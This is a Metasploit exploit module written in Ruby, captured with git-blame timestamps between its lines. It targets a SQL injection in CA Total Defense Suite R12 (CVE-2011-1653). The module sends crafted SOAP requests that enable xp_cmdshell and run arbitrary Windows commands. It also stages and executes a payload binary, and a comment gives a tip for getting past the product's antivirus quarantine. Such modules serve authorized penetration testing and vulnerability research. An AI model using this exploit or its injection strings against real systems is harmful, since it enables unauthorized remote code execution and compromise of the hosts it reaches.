2011-10-02 15:53:44 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-10-02 15:53:44 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
2014-02-08 00:46:19 +00:00
|
|
|
include Msf::Exploit::CmdStager
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
2015-05-06 16:34:05 +00:00
|
|
|
include Msf::Exploit::EXE
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a SQL injection flaw in CA Total Defense Suite R12.
|
|
|
|
When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an
|
|
|
|
attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql
|
|
|
|
statements into the ReportIDs element.
|
|
|
|
|
|
|
|
},
|
|
|
|
'Author' => [ 'MC' ],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
2013-10-21 20:07:07 +00:00
|
|
|
[ 'ZDI', '11-134' ],
|
2016-07-15 17:00:31 +00:00
|
|
|
[ 'OSVDB', '74968'],
|
2013-08-30 21:28:54 +00:00
|
|
|
[ 'CVE', '2011-1653' ],
|
|
|
|
],
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Windows Universal',
|
|
|
|
{
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'Platform' => 'win'
|
|
|
|
}
|
|
|
|
]
|
|
|
|
],
|
2014-02-08 23:11:47 +00:00
|
|
|
'CmdStagerFlavor' => 'tftp',
|
2013-08-30 21:28:54 +00:00
|
|
|
'Privileged' => true,
|
|
|
|
'Platform' => 'win',
|
|
|
|
'DisclosureDate' => 'Apr 13 2011',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(34443),
|
|
|
|
OptBool.new('SSL', [ true, 'Use SSL', true ]),
|
|
|
|
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def windows_stager
|
|
|
|
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
2014-06-28 21:40:49 +00:00
|
|
|
execute_cmdstager({ :temp => '.' })
|
2015-05-06 16:34:05 +00:00
|
|
|
@payload_exe = generate_payload_exe
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
print_status("Attempting to execute the payload...")
|
|
|
|
execute_command(@payload_exe)
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def execute_command(cmd, opts = {})
|
|
|
|
|
|
|
|
# NOTE: This module was tested against the MS SQL Server 2005 Express bundled with
|
|
|
|
# CA Total Defense Suite R12. CA's Total Defense Suite real-time protection
|
|
|
|
# will quarantine the default framework executable payload. Choosing an alternate
|
|
|
|
# exe template will bypass the quarantine.
|
|
|
|
|
|
|
|
inject = [
|
|
|
|
"'') exec master.dbo.sp_configure 'show advanced options', 1;reconfigure;--",
|
|
|
|
"'') exec master.dbo.sp_configure 'xp_cmdshell',1;reconfigure;--",
|
|
|
|
"'') exec master.dbo.xp_cmdshell 'cmd.exe /c #{cmd}';--",
|
|
|
|
]
|
|
|
|
|
|
|
|
inject.each do |sqli|
|
|
|
|
|
|
|
|
soap = %Q|<?xml version="1.0" encoding="utf-8"?>
|
2011-10-02 15:53:44 +00:00
|
|
|
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
|
2013-08-30 21:28:54 +00:00
|
|
|
<soap12:Body>
|
|
|
|
<reGenerateReports xmlns="http://tempuri.org/">
|
|
|
|
<EnterpriseID>msf</EnterpriseID>
|
|
|
|
<ReportIDs>#{sqli}</ReportIDs>
|
|
|
|
<UserID>187</UserID>
|
|
|
|
</reGenerateReports>
|
|
|
|
</soap12:Body>
|
2011-10-02 15:53:44 +00:00
|
|
|
</soap12:Envelope>
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => '/UNCWS/Management.asmx',
|
|
|
|
'method' => 'POST',
|
|
|
|
'version' => '1.0',
|
|
|
|
'ctype' => 'application/soap+xml; charset=utf-8',
|
|
|
|
'data' => soap,
|
|
|
|
}, 5)
|
|
|
|
|
|
|
|
if ( res and res.body =~ /SUCCESS/ )
|
|
|
|
#print_good("Executing command...")
|
|
|
|
else
|
|
|
|
fail_with(Failure::Unknown, 'Something went wrong.')
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
2016-05-20 00:21:45 +00:00
|
|
|
unless datastore['CMD'].blank?
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Executing command '#{datastore['CMD']}'")
|
|
|
|
execute_command(datastore['CMD'])
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
case target['Platform']
|
|
|
|
when 'win'
|
|
|
|
windows_stager
|
|
|
|
else
|
|
|
|
fail_with(Failure::Unknown, 'Target not supported.')
|
|
|
|
end
|
|
|
|
|
|
|
|
handler
|
|
|
|
|
|
|
|
end
|
2011-10-02 15:53:44 +00:00
|
|
|
end
|
|
|
|
__END__
|
|
|
|
POST /UNCWS/Management.asmx HTTP/1.1
|
|
|
|
Host: 192.168.31.129
|
|
|
|
Content-Type: application/soap+xml; charset=utf-8
|
|
|
|
Content-Length: length
|
|
|
|
|
|
|
|
<?xml version="1.0" encoding="utf-8"?>
|
|
|
|
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
|
2013-08-30 21:28:54 +00:00
|
|
|
<soap12:Body>
|
|
|
|
<reGenerateReports xmlns="http://tempuri.org/">
|
|
|
|
<EnterpriseID>string</EnterpriseID>
|
|
|
|
<ReportIDs>string</ReportIDs> <--boom!!
|
|
|
|
<UserID>long</UserID>
|
|
|
|
</reGenerateReports>
|
|
|
|
</soap12:Body>
|
2011-10-02 15:53:44 +00:00
|
|
|
</soap12:Envelope>
|